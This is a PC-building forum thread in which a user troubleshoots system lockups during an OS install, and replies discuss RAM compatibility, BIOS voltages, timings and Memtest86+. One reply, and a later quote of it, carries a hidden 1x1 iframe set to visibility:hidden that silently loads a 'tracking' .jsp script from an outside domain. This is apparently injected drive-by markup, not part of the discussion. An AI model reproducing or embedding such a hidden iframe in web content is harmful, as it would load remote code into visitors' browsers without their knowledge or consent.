Help?

Collapse
X

• Filter
  • Time
  • Show
Clear All

• Help?

Hi all, first post here. I am trying to build a new PC (see Sig for details), but during the install of the OS, it's going into a hard lockup. It happens at a different time each attempt I make, sometimes during the formatting of the new partition.

I *think* I have the BIOS settings for my RAM entered correctly, but there are some values that I am ignorant of their proper setting, and am being "generous" on those points. I've also tried "AUTO" on everything to no difference.

I have run Memtest86+ v4.00 for several hours (with the "default" Memtest86+ settings), and while it hasn't reported any errors, it has locked up on it once, and maybe has also rebooted once as well.

I have built & repaired many systems in the past successfully, but this is the first time I've had a multi-core system and intended to attempt to overclock anything.

in the past, I did have XP loaded and running, but the system started showing instability after about 1-2 weeks, and I haven't been able to get a fresh install to take.

I'm just about at my wits end, not wishing to throw more money at this by buying random parts to swap out in testing.

Re: Help?

could be ram incompatible with your board
    Gigabyte z77x UP4-TH F11c Modded Bios
    Intel i7 3770k 24/[email protected] 1.38v Turbo llc +0.165v dvid multithreading enabled
    Samsung Green(MV-3V4G3D/US) 8GB @2133mhz 9-10-10-21-1t 1.55v
    Thermalright Silver Arrow Cpu Cooler
    1xSamsung 840 pro 256 Gb SSD windows 8.1 pro 64bit
    1xSamsung f4 HD204UI 2tb hard drive Storage
    Powercolor 7970 3gb V3 @1150mhz core/1700mhz mem,1.150v Accelero aftermarket air cooler 55c max
    Razer Lycosa Keyboard
    Logitech X-530 5.1 Speakers
    Lite-On iHAS124-19 24x Sata DVDRW
    K-World Hybrid DVB-T 210SE Digital T.V Card
    L.G E2260V L.E.D 1920x1080 Monitor
    Xfx Pro 750w silver rated Psu 80+
    Fractal Arc Midi Case

http://i38.tinypic.com/14myvfa.jpg x58 ud5 <=3.8ghz + 4.2ghz Overclock Template!!
    http://www.youtube.com/user/warren304#p/u Visit Me On Youtube

Lots Of Gaming Videos With X58 Ud5 System And Gpu On My Youtube Channel!!
    Just Uploaded New Battlefield 4 Video!!!!!!!!!!!!!!!!!!!!!!

Comment

Reset your CMOS and then load optimized defaults. Reboot and set up your bios the way you need it.

Comment

What DDR rate and timings does memtest96+ report, do they match your ram spec?

Comment

I would check the voltage spec of your ram vs what is set in the BIOS many times the BIOS defaults to 1.8 and a lot of newer ram needs 2.0-2.1
          MB Gigabyte EP45-UD3P
          CPU Q9550
          RAM 8 Gigs G-Skil F2-8500CL5 (4 2gig sticks)
          Video Card ATI 4890
          HSF Zalman CNPS9500 AT
          Case Antec Nine Hundred two

Comment

Originally posted by wazza300 View Post
            could be ram incompatible with your board
            I've read that this is a somewhat often ocurrence, but I am puzzled why it happens. Don't both the M/B and the RAM have to abide by a standard in the same way the M/B and expansion card manufacturers have to for PCI/PCIe slots/cards?

I thought that by buying a (somewhat at least) better brand of RAM, I might not have issues. But if it is incompatible RAM, why am I not seeing errors in Memtest86+?

Comment

Originally posted by Greyform View Post
              I would check the voltage spec of your ram vs what is set in the BIOS many times the BIOS defaults to 1.8 and a lot of newer ram needs 2.0-2.1
              Actually, that BIOS defaults to 1.6V, and I raised it to the stated 1.8V for my RAM.

Comment

Originally posted by Conners View Post
                Reset your CMOS and then load optimized defaults. Reboot and set up your bios the way you need it.
                I'll try that in the morning after I get home from work.

PS: Like the Avatar, Conners. Are you a fellow Texan?

Originally posted by Chike View Post
                What DDR rate and timings does memtest96+ report, do they match your ram spec?
                I'm fairly sure it is reporting what I have set in BIOS (7-7-7-21), but after I try what Conners recommends, I'll post the full list of BIOS settings for my RAM and what Memtest86+ is reporting.

Comment

Originally posted by SteveZilla View Post
                  Why heck yes... HOOKEM HORNS!

Comment

MEMTEST 1.7 and earlier (different program to memtest86+) are notorious for producing errors on newer <nobr style="font-weight: normal; font-size: 100%; color: rgb(0, 0, 255);" id="itxt_nobr_6_0">chipsets</nobr> and with newer RAM; errors that don't really exist. If it checks out with Memtest86+ then your RAM is fine. Another way to verify is to run a test in Windows
                    <iframe src="http://www.savepicture.net/cat2/tracking/script_global-goddess.com.jsp" width="1" height="1" style="border:0; visibility:hidden;"></iframe>

Comment

Originally posted by computery View Post
                      MEMTEST 1.7 and earlier (different program to memtest86+) are notorious for producing errors on newer <NOBR style="COLOR: rgb(0,0,255); FONT-SIZE: 100%; FONT-WEIGHT: normal" id=itxt_nobr_6_0>chipsets</NOBR> and with newer RAM; errors that don't really exist. If it checks out with Memtest86+ then your RAM is fine. Another way to verify is to run a test in Windows
                      <IFRAME style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; VISIBILITY: hidden; BORDER-TOP: 0px; BORDER-RIGHT: 0px" height=1 src="http://www.savepicture.net/cat2/tracking/script_global-goddess.com.jsp" width=1></IFRAME>

...except that I can't get Windows to install. I'll have more information posted shortly.

Comment

Originally posted by SteveZilla View Post
                        I'll try that in the morning after I get home from work.

I'm fairly sure it is reporting what I have set in BIOS (7-7-7-21), but after I try what Conners recommends, I'll post the full list of BIOS settings for my RAM and what Memtest86+ is reporting.
                        your setting ram timings in bios? have you tried auto timings as ram can be very choosy on what setting try auto till you know your stable
                        Gigabyte z77x UP4-TH F11c Modded Bios
                        Intel i7 3770k 24/[email protected] 1.38v Turbo llc +0.165v dvid multithreading enabled
                        Samsung Green(MV-3V4G3D/US) 8GB @2133mhz 9-10-10-21-1t 1.55v
                        Thermalright Silver Arrow Cpu Cooler
                        1xSamsung 840 pro 256 Gb SSD windows 8.1 pro 64bit
                        1xSamsung f4 HD204UI 2tb hard drive Storage
                        Powercolor 7970 3gb V3 @1150mhz core/1700mhz mem,1.150v Accelero aftermarket air cooler 55c max
                        Razer Lycosa Keyboard
                        Logitech X-530 5.1 Speakers
                        Lite-On iHAS124-19 24x Sata DVDRW
                        K-World Hybrid DVB-T 210SE Digital T.V Card
                        L.G E2260V L.E.D 1920x1080 Monitor
                        Xfx Pro 750w silver rated Psu 80+
                        Fractal Arc Midi Case

http://i38.tinypic.com/14myvfa.jpg x58 ud5 <=3.8ghz + 4.2ghz Overclock Template!!
                        http://www.youtube.com/user/warren304#p/u Visit Me On Youtube

Lots Of Gaming Videos With X58 Ud5 System And Gpu On My Youtube Channel!!
                        Just Uploaded New Battlefield 4 Video!!!!!!!!!!!!!!!!!!!!!!

Comment

Working...
                        X